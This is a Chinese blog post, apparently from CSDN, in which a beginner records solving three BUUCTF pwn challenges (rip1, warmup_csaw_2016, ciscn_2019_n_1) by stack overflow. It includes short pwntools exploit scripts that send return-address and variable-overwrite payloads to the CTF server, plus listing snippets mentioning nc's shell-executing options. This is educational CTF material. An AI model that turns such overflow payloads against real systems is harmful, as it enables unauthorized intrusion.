pwn的初学记录

最新推荐文章于 2024-04-26 17:43:46 发布
最新推荐文章于 2024-04-26 17:43:46 发布
阅读量568 收藏
点赞数
分类专栏: pwn 文章标签: ubuntu linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/limenzzz/article/details/127405100
版权
本文记录了作者在CTF比赛中遇到的栈溢出漏洞利用及shellcode构造的过程,包括三个不同题目。通过checksec检查保护措施,使用ida分析函数,针对不同情况构造payload。在某些glibc版本中,system调用可能失败,需要使用shellcode直接执行。最终成功获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

终于配好了自己的pwn机。也是借此记录一下学习记录。题目摘自buuctf

一.pwn机基本介绍

ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建_hollk的博客-优快云博客_ubuntu安装pwn环境

按照如上教程配置,python2换成了python3.两者有所差别,以后会在这里进行补充。

区别:

1.python3中byte和string需要转换,在字符串前需要加上b来改变属性。比如

payload=b'a'*44+p64(0x41348000)

2.按照配置python的使用不需要再使用python2直接使用python即可,方便了一些。

二.题目解析 

1.rip1

 先用checksec查看一下有无保护。发现没有

ida看一下主函数发现有get,应该是个栈溢出,找到/bin/sh 

 

 

 溢出调用一下fun即可

在这里直接使用

payload=b'a'*23+p64(0x401186)

出现了错误,查资料得知某些版本glibc调用system会出错,贴上学习链接

在一些64位的glibc的payload调用system函数失败问题 - Rookle - 博客园

 于是构造shellcode

from pwn import *
p = remote('node4.buuoj.cn',29058)
payload=b'a'*23+p64(0x401186+1)
p.sendline(payload)
p.interactive()

得到flag

 2.warmup_csaw_2016

 ida下看到cat flag

还是和上题差不多的栈溢出

shellcode

from pwn import *
p = remote('node4.buuoj.cn',28749)
payload=b'a'*72+p64(0x000000000040060D+1)
p.sendline(payload)
p.interactive()

 

 3.ciscn_2019_n_1

ida看一下主函数,发现是读取v1,判断v2是否等于11.28125.是则获取flag

 而v1和v2传输地址可以转为如图

 

因为使用gets,则栈溢出只需在读入v1时将v2覆盖即可。寻找11.2815的16机制表示。

 发现有两个比较过程,点击查看

找到16进制表示。构造shellcode

from pwn import *
p = remote('node4.buuoj.cn',28794)
payload=b'a'*44+p64(0x41348000)
p.sendline(payload)
p.interactive()

 得到flag

PWN——rip1——没有保护的栈溢出
2301_80905479的博客
12-03 592
gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到 \n 结束,则会无限读取,没有上限。那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。因此再回来看fun()函数,就是一个系统调用,故payload=‘a’ * 15 + p64(0x401186)我们从源代码看到有个危险函数gets,这个函数对边界没有检查,可以造成栈溢出。用F5查看函数,看看是什么函数。
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 2714
(写得好详细我好爱(为什么payload有两种写法于。
(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016
J1ayの博客
09-10 1611
⭐ 【buuctf】pwn入门 pwn学习之路引入 栈溢出引入 ⭐test_your_nc 【题目链接】 注意到 Ubuntu 18, Linux系统 。 nc 靶场 nc node3.buuoj.cn 25677 【注】 nc命令详解 -c shell命令为“-e”;使用/bin/sh来执行 [危险] -e 文件名程序在连接后执行 [危险] -b 允许广播 -g 网关源路由跃点,最多8个 -G num源路由指针:4,8,12。。。 -i secs 发送的线
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 6687
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 629
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
【网络安全竞赛】XCTF联赛常考题目解析:涵盖Web、密码学、逆向、Pwn、MISC等方向的实战训练
最新发布
04-05
适合人群:对网络安全感兴趣的初学者,尤其是计划参加XCTF联赛或其他类似网络安全竞赛的学生或爱好者。; 使用场景及目标:①作为赛前训练材料,帮助参赛者熟悉XCTF联赛的出题风格和考察重点;②提升读者在不同领域的...
pwn格式化字符串漏洞小结
PLpa的博客
11-30 2683
格式化字符串漏洞 0x00.前言 在pwn中,格式化字符串漏洞是一个非常基础的漏洞,他通常穿插在各种漏洞之中。比如,当程序开了PIE保护时,在栈溢出之前,我们先可以运用格式化字符串漏洞获取栈中的信息;通过格式化字符串漏洞的任意地址写,我们可以把栈帧劫持到堆地址上;我们甚至可以直接通过任意地址写,劫持got表,实现getshell…… 总而言之,格式化字符串漏洞虽然在目前市面上的软件中比较难以看到,...
Python库 | pwn-machine-1.1.tar.gz
03-11
总的来说,“pwn-machine-1.1”是Python安全社区的一个宝贵资源,它将复杂的漏洞利用技术封装起来,为初学者和专业人士提供了一个易用的平台。通过学习和使用这个库,你可以提升自己的安全技能,更好地保护网络系统...
CTF PWN挑战攻略与技巧解析
8. 漏洞利用文章: 在这个资源库中,作者分享了他/她完成的PWN挑战文章,这些文章详细记录了解题过程、所利用的漏洞类型、利用方法和成功控制目标系统的步骤。这些文章不仅对CTF竞赛的参与者有极大的帮助,也对学习二...
pwn 做题出现的问题
qq_53086690的博客
05-07 884
看网上的一些exp是'a' * 15 + p64(0x401186)这样写的但是自己运行的时候会报错 can only concatenate str (not “bytes”) to str 在网上查了一下是python版本的问题只要在a的前边加上b就可以了b'a' * 15 + p64(0x401186) ...
关于glibc的system函数调用实现
Blue summer的博客
08-09 1419
system在glibc下的实现
CTF常用python库PwnTools的使用学习
weixin_30484739的博客
08-02 903
  之前主要是使用zio库,对pwntools的了解仅限于DynELF,以为zio就可以取代pwntools。后来发现pwntools有很多的高级用法都不曾听说过,这次学习一下用法,希望可以在以后的exp编写中能提供效率。   PwnTools的官网如下:http://pwntools.com/   安装方法是使用pip命令,pip install pwn。这样就可以安装上pwn库了。使用时用...
字符串编码解决python3 payload=‘a‘ +p64(1926)报错问题
yongbaoii的博客
09-29 7491
基于一些PWN题实战发现的问题 先对题目进行简述,简单的栈溢出,要求在填充八个字节以后用int类型1926对后面四个字节进行覆盖 先上代码以及报错信息 from pwn import* r = remote("220.249.52.133",47338) payload='aaaaaaaa' payload += p64(1926) r.recvuntil("What's Your Birth?\n") r.sendline("2000") r.recvuntil("What's Your Name?\n"
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
【Writeup】BUUCTF_Pwn_RIP覆盖一下
BAKUMANSEC - Just Do It
08-17 3955
0x01 解题思路 查看文件信息 ​ 没什么防护措施的ELF64文件。 拖入IDA x64,F5 ​ 显然可以通过栈溢出覆盖RIP。 发现命令执行函数 地址为0x401186 利用peda计算输入点距离RIP的偏移值 得出偏移量是23。 现在就可以写出覆盖RIP执行fun函数的EXP了。 0x02 EXP from pwn import * io=0 ...
PWN-学习笔记
小龙在线
08-23 757
原理 危险函数:gets scanf pwndbg Python2 安装 pip install pwntools apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com
Python - pwntools
Nixawk
05-18 2277
pwntools is the CTF framework used by Gallopsled in every CTF.pwnlib.asm pwnlib.atexception pwnlib.atexit pwnlib.constants pwnlib.context pwnlib.dynelf pwnlib.elf pwnlib.exception pwnlib.fmtstr pwnlib.
PWN学习,对CTF-wiki上的讲解进行一些补充
qq_33948522的博客
06-27 5955
`基本知识 ROP Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 一般的栈结构: 高地址 +-----------------+ ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值